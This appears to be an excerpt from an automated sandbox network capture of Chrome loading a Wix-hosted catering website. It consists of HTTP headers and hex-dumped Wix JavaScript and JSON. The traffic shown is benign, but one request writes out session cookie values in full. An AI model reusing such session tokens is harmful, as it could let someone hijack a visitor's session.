                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 69 d2 a7 e5 0a 28 79 01 1c dd 40 cf 8b 5f 80 57 bc f7 5d 08 0a 39 84 ba 81 62 b5 8c ae 25 5d 60 95 0a 4c 27 c0 5d df fe 0e dc 6d bb 61 da 0e 0c d2 fd a2 ca ff fd 10 0b 9d 97 62 3f 3c 63 a2 1a 44 92 58 4e be f4 bd 58 fe 8a 13 31 42 1d 27 75 5d 5a 51 ca 62 51 16 cb b4 1f 25 41 ca 40 24 5c 99 88 59 46 7e 48 82 96 23 9c 69 b7 3d bb 71 d3 b7 85 d9 71 f7 7c 90 8b 22 96 69 cf a8 3a b0 15 10 d0 18 87 17 06 b2 3e 25 f0 3c e4 84 0e 2b 0c a1 57 ea f8 e5 d7 af 42 61 f7 d0 28 b1 50 44 23 dd 12 df 36 fd 1c 35 88 29 0b 9b 31 94 74 1d af 7a db f9 58 7a da c9 28 b3 18 c2 b4 e0 86 01 f5 e6 82 19 86 c8 7a 01 9e b9 e9 66 6c 59 7f 0f 0a 7e 08 23 a2 46 61 93 13 8b b0 32 a8 f8 21 ca 05 0b af b8 e4 3d 58 f1 f2 13 50 f2 42 2a e1 07 f5 e3 50 c4 a2 88 65 ba cf 12 c9 0c 71 4d c8 0e
                                                                                                                                                                                                                        Data Ascii: i(y@_W]9b%]`L']mab?<cDXNX1B'u]ZQbQ%A@$\YF~H#i=qq|"i:>%<+WBa(PD#65)1tzXz(zflY~#Fa2!=XPB*PeqM
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 29 62 99 fb b9 67 d2 e2 26 65 64 99 2d 16 83 2c 97 72 14 85 b7 6f da bc e3 5b 56 be e7 ce b9 88 b9 28 62 99 fb 99 55 57 98 43 04 d2 3a 96 48 03 34 ce a0 05 b1 b4 58 8c ba 83 2d b7 df 83 6d 37 ad 9f 94 58 48 d4 cf 8b 62 c4 ba 86 41 4d e0 95 17 ad 43 cf 89 2f 42 4d e8 80 65 c1 0f 80 90 c8 8b b4 c2 44 52 b7 92 77 02 fc f6 6f ff 05 9d e5 ba 94 84 a1 fa 98 89 5c 61 d4 e7 85 ce ed 31 81 72 21 8b f3 fe e9 af 51 e2 31 3c cd 50 c4 42 75 44 ca 15 36 a3 a7 63 aa 7e 2e a4 dc 4d 9b a9 e9 32 5b cc b2 2c d9 cf 45 30 5e 76 1c f7 ae be fe 91 af 0f 8d 54 ef 9d 6d b7 98 22 96 19 4d ab 3a 78 be 11 20 62 71 7c 0f cc 14 a0 2e f3 22 8c 65 1d 8b 69 bb 18 78 e8 71 3c fa 93 5f 49 62 21 ad 30 49 00 71 a3 c3 63 c3 6a 21 62 f1 e3 08 3e e3 18 c9 1a 58 73 de eb 70 fc 6b ce 4c 44 22 8d
                                                                                                                                                                                                                        Data Ascii: )bg&ed-,ro[V(bUWC:H4X-m7XHbAMC/BMeDRwo\a1r!Q1<PBuD6c~.M2[,E0^vTm"M:x bq|."eixq<_Ib!0Iqcj!b>XspkLD"


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        85192.168.2.55001134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC405OUTGET /services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1145
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: G7f99uHE6zqtR2frvfyhY1F8g28ffUtT
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 641328179 637344453
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 976558986
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273547
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:57 GMT
                                                                                                                                                                                                                        ETag: "297cd10b2ce6e15bd86473ec1ca874b7"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 34 35 37 5d 2c 7b 31 35 34 32 38 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 6e 3d 61 28 34 31 35 39 34 29 2c 73 3d 61 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 64 3d 28 7b 69 64 3a 65 7d 29 3d 3e 73 28 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 69 64 3a 65
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7457],{15428:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({id:e})=>s().createElement("div",{id:e
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC917INData Raw: 2c 73 74 79 6c 65 3a 7b 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 7d 7d 29 7d 2c 37 35 31 32 30 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 6e 3d 61 28 34 31 35 39 34 29 2c 73 3d 61 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 64 3d 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 69 64 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 2c 72 65 6e 64 65 72 43 6f 6d 70 43 73 73 49 6e 53 69 74 65 52 6f 6f 74 3a 6e 2c 63 6f 6d 70 6f 6e 65 6e 74 73 43 73 73 3a 64 7d 29 3d 3e 73 28 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 69 64 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 7d 2c 6e 26 26 64 26 26 64 2e 6d 61 70 28 28 28 7b 43 53 53 3a 65 7d 29 3d 3e 65 29 29 2c 65 28 29 29
                                                                                                                                                                                                                        Data Ascii: ,style:{display:"none"}})},75120:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({children:e,id:t,className:a,renderCompCssInSiteRoot:n,componentsCss:d})=>s().createElement("div",{id:t,className:a},n&&d&&d.map((({CSS:e})=>e)),e())


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        86192.168.2.55001234.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC641OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 6785
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC6785OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 6c 6f 61 64 5f 72 65 6e 64 65 72 65 72 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 46 49 4e 49 53 48 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 44 75 72 61 74 69 6f 6e 22 3a 32 38
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"load_renderer","transactionAction":"FINISH","transactionDuration":28
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC899INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLmSZKl67brQQl8dbjO78wsJ9UuJLvoOY0uBy3RuVN3og,rXUceJIlvIg2Ftogbhjv0CGcEEZROUpjGq8HlVl0vudEQfi00LSS7LJu7sdkoLsDh6qPngpXVpNKJ0WJTA/IuA==,r6yY0ta7bIKrqK70x072lUn1Hzrz6tRwKV4D+4rztCE=,bOnBQDOCjWxRPsoIciwTIQ1OnFudNM0zh78tH3D5EVBER+jYadSkHzyfPeAvTTAuVzWUXZzFRHmXWVReCOo90A==
                                                                                                                                                                                                                        x-wix-request-id: 1736517187.601121353827394093757
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        87192.168.2.55001334.149.87.454435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC915OUTGET /_api/tag-manager/api/v1/tags/sites/8fc1138c-79b4-4e29-bbc0-d551c6ca71af?wixSite=false&htmlsiteId=cd5327d5-636b-4778-a97d-3945688a9fde&language=en&partytown=false HTTP/1.1
                                                                                                                                                                                                                        Host: www.samantacatering.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Cookie: XSRF-TOKEN=1736517156|zNWYyaBL2sXn; hs=441353572; svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5; bSession=153dfd08-7420-4371-86fb-5d02f7e531d5|1
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 788
                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                        ETag: W/"314-lOypOccj/vT2TfcOcuOl4nWpBnY"
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                        X-Wix-Request-Id: 1736517189.028109340754221079244
                                                                                                                                                                                                                        Server: Pepyaka
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:09 GMT
                                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100061-IAD
                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=86401
                                                                                                                                                                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,F/2b1J1kmHV2BLnAgEYozG/OECie9JXwS2jzlBjQ20Aj6r0AZAMucqm4C7kwBEyaVID+Ma4bsyviMUEAewIkdA==,/B3VgDtICCNDWQOEWfZmMtA0Ox1fsMPnK/mEKpDglrI=,MDFDoTqjWxpWhAuWfTm+PMq9jIDkCC8v1QwyCL0JonssfSsNgMgEwvTP0FVerewwLuPKwcb2SirG8PjBvwh71ViB5QmpRe2J37zq9nDD6cs=,/B3VgDtICCNDWQOEWfZmMlpKh6mlzsKyoZuJR2jnwvA=,mvxQ9qSAmY38asKjFCcmG+2YyfvPy8GEG+3+SMl7u7gWycLok4W6R6udvxRRv3NUOepJR792h3NHbXv9WizncEmG5VidfiODQol1/quSTDw=,/B3VgDtICCNDWQOEWfZmMtLF9igK4GU0Vw8MAEdx+Ik=,tznMqpp3e1oucszW+OT1FCyIGdvvM+Gvk6kv3gMXCU6WBehDA5ecf12Phaf/4AA6HGND8LdL3FNaixDMt9BYgavKNKAbM4PNX5ZaXhw6uxQ=
                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC207INData Raw: 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 65 72 72 6f 72 73 22 3a 5b 5d 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 22 3a 6e 75 6c 6c 2c 22 67 65 6f 22 3a 22 55 53 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 73 22 3a 7b 22 73 70 65 63 73 2e 63 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 2e 50 6f 6c 69 63 79 42 79 47 6c 6f 62 61 6c 50 72 69 76 61 63 79 43 6f 6e 74 72 6f 6c 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 43 6f 6e 66 69 67 4f 76 65 72 72 69 64 65 73 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 52 65 6e 64 65 72 54 61 67 42 79
                                                                                                                                                                                                                        Data Ascii: {"tags":[],"errors":[],"config":{"consentPolicy":null,"geo":"US","experiments":{"specs.cookieConsent.PolicyByGlobalPrivacyControl":"true","specs.tagManagerConfigOverrides":"true","specs.tagManagerRenderTagBy
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC581INData Raw: 50 61 67 65 49 44 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 2e 52 65 61 64 4c 6f 61 64 4f 6e 63 65 46 72 6f 6d 54 61 67 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 69 67 6e 6f 72 65 44 69 73 61 62 6c 65 64 41 70 70 4d 61 72 6b 65 74 54 65 6d 70 6c 61 74 65 73 22 3a 22 66 61 6c 73 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 45 6d 62 65 64 53 63 72 69 70 74 73 46 72 65 65 53 69 74 65 73 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 63 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 2e 43 63 70 57 69 78 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 44 65 63 6c 69 6e 65 41 6c 6c 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 52 65 6e 64 65 72 47 6f 6f 67 6c 65 43 6f 6e 73 65 6e 74 4d 6f 64 65
                                                                                                                                                                                                                        Data Ascii: PageID":"true","specs.tagManager.ReadLoadOnceFromTag":"true","specs.ignoreDisabledAppMarketTemplates":"false","specs.tagManagerEmbedScriptsFreeSites":"true","specs.cookieConsent.CcpWixCookieBannerDeclineAll":"true","specs.tagManagerRenderGoogleConsentMode


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        88192.168.2.55001434.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC410OUTGET /services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 35199
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: 6OgDcDzOJXgYEKTi2Z37UewVnBK5VK8g
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 1072452589 908634488
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 178036624
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:45:16 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 25671
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:16 GMT
                                                                                                                                                                                                                        ETag: "0791809290eee3cb00a08a33e5ae90f3"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC227INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 36 35 35 5d 2c 7b 39 35 36 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 74 3d 28 29 3d 3e 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 37 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 65 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4655],{95667:function(e){var t;"undefined"!=typeof self&&self,t=()=>(()=>{var e={724:function(e,t,n){var r;e.exports=(r=r||function(e,t)
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 29 2c 21 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64
                                                                                                                                                                                                                        Data Ascii: {var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=wind
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 65 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 6f 3d 65 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6f 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 69 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 69 25 34 2a 38 26 32 35 35 3b 74 5b 72 2b 69 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 28 72 2b 69 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 6f 3b 63 2b 3d 34 29 74 5b 72 2b 63 3e 3e 3e 32 5d 3d 6e 5b 63 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73
                                                                                                                                                                                                                        Data Ascii: ringify(this)},concat:function(e){var t=this.words,n=e.words,r=this.sigBytes,o=e.sigBytes;if(this.clamp(),r%4)for(var i=0;i<o;i++){var a=n[i>>>2]>>>24-i%4*8&255;t[r+i>>>2]|=a<<24-(r+i)%4*8}else for(var c=0;c<o;c+=4)t[r+c>>>2]=n[c>>>2];return this.sigBytes
